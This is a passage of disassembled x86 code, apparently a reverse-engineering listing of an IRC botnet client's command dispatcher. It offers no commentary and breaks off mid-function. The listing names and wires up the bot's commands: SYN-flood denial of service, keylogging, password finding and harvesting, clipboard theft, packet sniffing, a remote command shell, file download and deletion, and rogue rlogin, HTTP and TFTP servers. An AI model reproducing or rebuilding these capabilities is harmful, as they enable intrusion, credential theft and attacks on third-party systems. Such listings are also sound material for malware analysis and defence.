test eax, eax
pop ecx
jz loc_4149DC
push edi
push offset aIrc_aliases ; "irc.aliases"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149BC
push edi
push offset aIrc_al ; "irc.al"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4149BC
push edi
push offset aIrc_log ; "irc.log"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148C9
push edi
push offset aIrc_lg ; "irc.lg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148C9
push edi
push offset aUtil_clearlog ; "util.clearlog"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148B0
push edi
push offset aUtil_clg ; "util.clg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4148B0
push edi
push offset aCom_netinfo ; "com.netinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41487E
push edi
push offset aCom_ni ; "com.ni"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41487E
push edi
push offset aDdos_supersyn ; "ddos.supersyn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410459
mov edi, [ebp+esi+var_90]
push 7Fh
lea eax, [ebp+var_76C]
push edi
push eax
call sub_418C10
mov eax, [ebp+esi+var_8C]
push 7Fh
mov [ebp+arg_18], eax
push eax
lea eax, [ebp+var_6EC]
push eax
call sub_418C10
mov esi, [ebp+esi+var_88]
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_418C10
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 30h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push esi
mov [ebp+var_564], eax
mov eax, [ebp+arg_4]
push [ebp+arg_18]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_437FC8
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 14h
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_401831
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_410448
loc_410432: ; CODE XREF: sub_40EE72+15D4�j
cmp [ebp+var_560], ebx
jnz loc_41460A
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_410432
; ---------------------------------------------------------------------------
loc_410448: ; CODE XREF: sub_40EE72+15BE�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_437F7C
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_410459: ; CODE XREF: sub_40EE72+14E6�j
push edi
push offset aCom_sysinfo ; "com.sysinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414850
push edi
push offset aCom_si ; "com.si"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414850
push edi
push offset aIrc_rem0ve ; "irc.rem0ve"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414816
push edi
push offset aIrc_rm0 ; "irc.rm0"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414816
push edi
push offset aCom_procs ; "com.procs"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41470D
push edi
push offset aCom_ps ; "com.ps"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41470D
push edi
push offset aCom_harvest ; "com.harvest"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4146EF
push edi
push offset aCom_key ; "com.key"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4146EF
push edi
push offset aCom_uptime ; "com.uptime"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41466A
push edi
push offset aCom_up ; "com.up"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41466A
push edi
push offset aCom_driveinfo ; "com.driveinfo"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41464D
push edi
push offset aCom_drv ; "com.drv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41464D
push edi
push offset aCom_testdlls ; "com.testdlls"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414634
push edi
push offset aCom_dll ; "com.dll"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414634
push edi
push offset aCom_opencmd ; "com.opencmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4145C8
push edi
push offset aCom_ocmd ; "com.ocmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4145C8
push edi
push offset aCom_ocmd_off ; "com.ocmd.off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4105D2
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_4105D2: ; CODE XREF: sub_40EE72+1746�j
push edi
push offset aIrc_who ; "irc.who"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41065E
cmp [ebp+var_8], ebx
jnz short loc_410602
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_410602: ; CODE XREF: sub_40EE72+1774�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_410607: ; CODE XREF: sub_40EE72+17DB�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_410613
mov eax, offset aEmpty ; "<Empty>"
loc_410613: ; CODE XREF: sub_40EE72+179A�j
push eax
push esi
lea eax, [ebp+var_2DC]
push offset aD_S ; "%d. %s"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_410607
push offset dword_437E50
loc_410654: ; CODE XREF: sub_40EE72+5C56�j
call sub_40BF6D
jmp loc_414F44
; ---------------------------------------------------------------------------
loc_41065E: ; CODE XREF: sub_40EE72+176F�j
push edi
push offset aCom_getclip ; "com.getclip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41457F
push edi
push offset aCom_gc ; "com.gc"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41457F
push edi
push offset aUtil_flusharp ; "util.flusharp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414554
push edi
push offset aUtil_farp ; "util.farp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414554
push edi
push offset aUtil_flushdns ; "util.flushdns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414530
push edi
push offset aUtil_fdns ; "util.fdns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414530
push edi
push offset aRoot_currentip ; "root.currentip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F3
push edi
push offset aRoot_cip ; "root.cip"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4144F3
push edi
push offset aDaemon_rlogi_0 ; "daemon.rlogin.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4143A2
push edi
push offset aDaemon_rl_on ; "daemon.rl.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4143A2
push edi
push offset aDaemon_httpd_o ; "daemon.httpd.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41422C
push edi
push offset aDaemon_web_on ; "daemon.web.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41422C
push edi
push offset aDaemon_tftp_on ; "daemon.tftp.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4140EB
push edi
push offset aDaemon_tf_on ; "daemon.tf.on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4140EB
push edi
push offset aCom_findpass ; "com.findpass"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414041
push edi
push offset aCom_fp ; "com.fp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_414041
push edi
push offset aAsc ; "asc"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D42
push edi
push offset aSa ; "sa"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D42
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40F239
push [ebp+arg_8]
push offset aIrc_nick ; "irc.nick"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D26
push [ebp+arg_8]
push offset aIrc_n ; "irc.n"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D26
push [ebp+arg_8]
push offset aIrc_join ; "irc.join"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D03
push [ebp+arg_8]
push offset aIrc_j ; "irc.j"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413D03
push [ebp+arg_8]
push offset aIrc_part ; "irc.part"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CE7
push [ebp+arg_8]
push offset aIrc_pt ; "irc.pt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CE7
push [ebp+arg_8]
push offset aIrc_raw ; "irc.raw"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CAD
push [ebp+arg_8]
push offset aIrc_ra ; "irc.ra"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413CAD
push [ebp+arg_8]
push offset aThreads_kill ; "threads.kill"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413BDB
push [ebp+arg_8]
push offset aThreads_k ; "threads.k"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413BDB
push [ebp+arg_8]
push offset aClone_quit ; "clone.quit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413B32
push [ebp+arg_8]
push offset aClone_q ; "clone.q"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413B32
push [ebp+arg_8]
push offset aClone_rndnick ; "clone.rndnick"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AE4
push [ebp+arg_8]
push offset aClone_rn ; "clone.rn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AE4
push [ebp+arg_8]
push offset aIrc_prefix ; "irc.prefix"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413ACF
push [ebp+arg_8]
push offset aIrc_pr ; "irc.pr"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413ACF
push [ebp+arg_8]
push offset aCom_open ; "com.open"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AA5
push [ebp+arg_8]
push offset aCom_o ; "com.o"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413AA5
push [ebp+arg_8]
push offset aIrc_setserve ; "irc.setserve"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413A8C
push [ebp+arg_8]
push offset aIrc_se ; "irc.se"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413A8C
push [ebp+arg_8]
push offset aIrc_dns ; "irc.dns"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139FA
push [ebp+arg_8]
push offset aIrc_dn ; "irc.dn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139FA
push [ebp+arg_8]
push offset aCom_killprocna ; "com.killprocname"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push [ebp+arg_8]
push offset aCom_kpn ; "com.kpn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push [ebp+arg_8]
push offset aCom_prockillid ; "com.prockillid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413973
push [ebp+arg_8]
push offset aCom_pkid ; "com.pkid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413973
push [ebp+arg_8]
push offset aCom_delete ; "com.delete"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413938
push [ebp+arg_8]
push offset aCom_del ; "com.del"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413938
push [ebp+arg_8]
push offset aDcc_get ; "dcc.get"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41384E
push [ebp+arg_8]
push offset aDcc_gt ; "dcc.gt"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41384E
push [ebp+arg_8]
push offset aCom_filelist ; "com.filelist"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413830
push [ebp+arg_8]
push offset aCom_fl ; "com.fl"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413830
push [ebp+arg_8]
push offset aIrc_visit ; "irc.visit"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41374F
push [ebp+arg_8]
push offset aIrc_v ; "irc.v"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41374F
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413714
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413714
push [ebp+arg_8]
push offset aCom_cmd ; "com.cmd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4136C9
push [ebp+arg_8]
push offset aCom_cm ; "com.cm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4136C9
push [ebp+arg_8]
push offset aCom_readfile ; "com.readfile"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413643
push [ebp+arg_8]
push offset aCom_rf ; "com.rf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413643
push [ebp+arg_8]
push offset aSniff ; "sniff"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410CCC
push edi
push offset aOn ; "on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410C97
push 19h
call sub_416FA2
test eax, eax
pop ecx
jle short loc_410BC1
push offset unk_437B84
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_410BC1: ; CODE XREF: sub_40EE72+1D43�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_410C03
mov esi, offset aF_1 ; "#f"
push offset byte_43C80C
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410C03
mov esi, [ebp+var_8C]
loc_410C03: ; CODE XREF: sub_40EE72+1D73�j
; sub_40EE72+1D89�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_437B44
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 19h
push eax
call sub_416D5A
add esp, 14h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_402688
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_410C86
loc_410C70: ; CODE XREF: sub_40EE72+1E12�j
cmp [ebp+var_460], ebx
jnz loc_410E57
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_410C70
; ---------------------------------------------------------------------------
loc_410C86: ; CODE XREF: sub_40EE72+1DFC�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_437AF8
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410C97: ; CODE XREF: sub_40EE72+1D33�j
push edi
push offset aOff ; "off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E57
push ebx
push 19h
call sub_416F55
pop ecx
cmp eax, ebx
pop ecx
jle short loc_410CC5
push eax
push offset unk_437AAC
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410CC5: ; CODE XREF: sub_40EE72+1E46�j
push offset unk_437A74
jmp short loc_410D38
; ---------------------------------------------------------------------------
loc_410CCC: ; CODE XREF: sub_40EE72+1D1E�j
push [ebp+arg_8]
push offset aCom_keylog ; "com.keylog"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E81
push edi
push offset aOn ; "on"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_410D4B
push edi
push offset aFile ; "file"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_410D4B
push edi
push offset aOff ; "off"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_410E57
push ebx
push 1Bh
call sub_416F55
pop ecx
cmp eax, ebx
pop ecx
jle short loc_410D33
push eax
push offset unk_437A1C
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_410D33: ; CODE XREF: sub_40EE72+1EB4�j
push offset unk_4379E0
loc_410D38: ; CODE XREF: sub_40EE72+1D4A�j
; sub_40EE72+1E58�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_410D4B: ; CODE XREF: sub_40EE72+1E80�j
; sub_40EE72+1E91�j
push 1Bh
call sub_416FA2
test eax, eax
pop ecx
jle short loc_410D5E
push offset unk_4379B0
jmp short loc_410D38
; ---------------------------------------------------------------------------
loc_410D5E: ; CODE XREF: sub_40EE72+1EE3�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
push offset aFile ; "file"
mov [ebp+var_468], eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410D8D
mov [ebp+var_464], 1
jmp short loc_410D96
; ---------------------------------------------------------------------------
loc_410D8D: ; CODE XREF: sub_40EE72+1F0D�j
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
loc_410D96: ; CODE XREF: sub_40EE72+1F19�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_410DBD
mov esi, offset aF_0 ; "#f"
push offset byte_43C80C
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410DBD
mov esi, [ebp+var_8C]
loc_410DBD: ; CODE XREF: sub_40EE72+1F2D�j
; sub_40EE72+1F43�j
push esi
lea eax, [ebp+var_4E8]
push 80h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_437980
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 1Bh
push eax
call sub_416D5A
add esp, 14h
mov [ebp+var_4EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_4023A7
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_410E3C
loc_410E2A: ; CODE XREF: sub_40EE72+1FC8�j
cmp [ebp+var_460], ebx
jnz short loc_410E57
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_410E2A
; ---------------------------------------------------------------------------
loc_410E3C: ; CODE XREF: sub_40EE72+1FB6�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_437934
loc_410E48: ; CODE XREF: sub_40EE72+1E20�j
; sub_40EE72+1E4E�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
loc_410E57: ; CODE XREF: sub_40EE72+1E04�j
; sub_40EE72+1E34�j ...
cmp [ebp+var_8], ebx
jnz loc_40F822
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_40F822
; ---------------------------------------------------------------------------
loc_410E81: ; CODE XREF: sub_40EE72+1E6B�j
push [ebp+arg_8]
push offset aCom_net ; "com.net"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_411114
cmp ds:dword_43F738, ebx
jz short loc_410EB2
cmp ds:dword_43F760, ebx
jz short loc_410EB2
push offset dword_4378E4
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410EB2: ; CODE XREF: sub_40EE72+202C�j
; sub_40EE72+2034�j
cmp [ebp+var_C], ebx
jz loc_4110DC
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_410EDA
push eax
push [ebp+var_C]
call sub_417880
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_410EDA: ; CODE XREF: sub_40EE72+2058�j
push edi
push offset aStart ; "start"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F26
cmp [ebp+arg_18], ebx
jz short loc_410EFA
push [ebp+arg_0]
push 3
jmp loc_410F84
; ---------------------------------------------------------------------------
loc_410EFA: ; CODE XREF: sub_40EE72+207C�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D9B3
add esp, 0Ch
test eax, eax
jz short loc_410F1C
push offset dword_4378B0
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410F1C: ; CODE XREF: sub_40EE72+209E�j
push offset dword_437880
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410F26: ; CODE XREF: sub_40EE72+2077�j
push edi
push offset aStop ; "stop"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F3E
push [ebp+arg_0]
push 4
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F3E: ; CODE XREF: sub_40EE72+20C3�j
push edi
push offset aPause ; "pause"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F56
push [ebp+arg_0]
push 5
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F56: ; CODE XREF: sub_40EE72+20DB�j
push edi
push offset aContinue ; "continue"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F6E
push [ebp+arg_0]
push 6
jmp short loc_410F84
; ---------------------------------------------------------------------------
loc_410F6E: ; CODE XREF: sub_40EE72+20F3�j
push edi
push offset aDelete ; "delete"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410F90
push [ebp+arg_0]
push 1
loc_410F84: ; CODE XREF: sub_40EE72+2083�j
; sub_40EE72+20CA�j ...
call sub_40D719
pop ecx
pop ecx
jmp loc_4110AB
; ---------------------------------------------------------------------------
loc_410F90: ; CODE XREF: sub_40EE72+210B�j
push edi
push offset aShare ; "share"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410FFB
cmp [ebp+arg_18], ebx
jz short loc_410FCE
cmp [ebp+var_9C4], bl
jz short loc_410FC1
push ebx
push [ebp+arg_18]
push 1
loc_410FB4: ; CODE XREF: sub_40EE72+215A�j
call sub_40DAF0
add esp, 0Ch
jmp loc_4110AB
; ---------------------------------------------------------------------------
loc_410FC1: ; CODE XREF: sub_40EE72+213A�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
jmp short loc_410FB4
; ---------------------------------------------------------------------------
loc_410FCE: ; CODE XREF: sub_40EE72+2132�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DCE6
add esp, 10h
test eax, eax
jz short loc_410FF1
push offset dword_437830
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410FF1: ; CODE XREF: sub_40EE72+2173�j
push offset dword_437800
jmp loc_4110CE
; ---------------------------------------------------------------------------
loc_410FFB: ; CODE XREF: sub_40EE72+212D�j
push edi
push offset aUser ; "user"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41107E
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_411057
cmp [ebp+var_9C4], bl
jz short loc_41102D
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_411047
; ---------------------------------------------------------------------------
loc_41102D: ; CODE XREF: sub_40EE72+21A7�j
push [ebp+var_4]
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_411051
push esi
push eax
push ebx
loc_411047: ; CODE XREF: sub_40EE72+21B9�j
; sub_40EE72+21E3�j
call sub_40DE07
add esp, 18h
jmp short loc_4110AB
; ---------------------------------------------------------------------------
loc_411051: ; CODE XREF: sub_40EE72+21D0�j
push ebx
push eax
push 2
jmp short loc_411047
; ---------------------------------------------------------------------------
loc_411057: ; CODE XREF: sub_40EE72+219F�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40E337
add esp, 10h
test eax, eax
jz short loc_411077
push offset dword_4377C8
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_411077: ; CODE XREF: sub_40EE72+21FC�j
push offset dword_43779C
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_41107E: ; CODE XREF: sub_40EE72+2198�j
push edi
push offset aSend ; "send"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4110C9
cmp [ebp+arg_18], ebx
jz short loc_4110C2
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E5EB
add esp, 10h
loc_4110AB: ; CODE XREF: sub_40EE72+2119�j
; sub_40EE72+214A�j ...
push eax
push offset aS_3 ; "%s"
loc_4110B1: ; CODE XREF: sub_40EE72+4852�j
; sub_40EE72+4B79�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
loc_4110BD: ; CODE XREF: sub_40EE72+5701�j
add esp, 0Ch
jmp short loc_4110DC
; ---------------------------------------------------------------------------
loc_4110C2: ; CODE XREF: sub_40EE72+2220�j
push offset dword_43776C
jmp short loc_4110CE
; ---------------------------------------------------------------------------
loc_4110C9: ; CODE XREF: sub_40EE72+221B�j
push offset dword_437740
loc_4110CE: ; CODE XREF: sub_40EE72+203B�j
; sub_40EE72+20A5�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4110DC: ; CODE XREF: sub_40EE72+2043�j
; sub_40EE72+224E�j ...
cmp [ebp+var_8], ebx
jnz short loc_4110FD
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_4110FD: ; CODE XREF: sub_40EE72+226D�j
; sub_40EE72+4847�j ...
mov esi, [ebp+arg_24]
loc_411100: ; CODE XREF: sub_40EE72+9B3�j
; sub_40EE72+4B35�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
pop ecx
mov eax, esi
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_411114: ; CODE XREF: sub_40EE72+2020�j
push [ebp+arg_8]
push offset aCom_capture ; "com.capture"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413400
push [ebp+arg_8]
push offset aCom_cap ; "com.cap"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413400
push [ebp+arg_8]
push offset aIrc_gethost ; "irc.gethost"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413312
push [ebp+arg_8]
push offset aIrc_gh ; "irc.gh"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413312
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40F239
push [ebp+arg_8]
push offset aIrc_addalias ; "irc.addalias"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4132E0
push [ebp+arg_8]
push offset aIrc_aa ; "irc.aa"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4132E0
push [ebp+arg_8]
push offset aIrc_privmsg ; "irc.privmsg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41328A
push [ebp+arg_8]
push offset aIrc_pm ; "irc.pm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41328A
push [ebp+arg_8]
push offset aIrc_action ; "irc.action"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413224
push [ebp+arg_8]
push offset aIrc_ac ; "irc.ac"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413224
push [ebp+arg_8]
push offset aIrc_cycle ; "irc.cycle"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4131BB
push [ebp+arg_8]
push offset aIrc_cy ; "irc.cy"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4131BB
push [ebp+arg_8]
push offset aIrc_mode ; "irc.mode"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413181
push [ebp+arg_8]
push offset aIrc_m ; "irc.m"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413181
push [ebp+arg_8]
push offset aClone_raw ; "clone.raw"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413113
push [ebp+arg_8]
push offset aClone_ra ; "clone.ra"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413113
push [ebp+arg_8]
push offset aClone_mode ; "clone.mode"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41308E
push [ebp+arg_8]
push offset aClone_m ; "clone.m"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41308E
push [ebp+arg_8]
push offset aClone_nick ; "clone.nick"
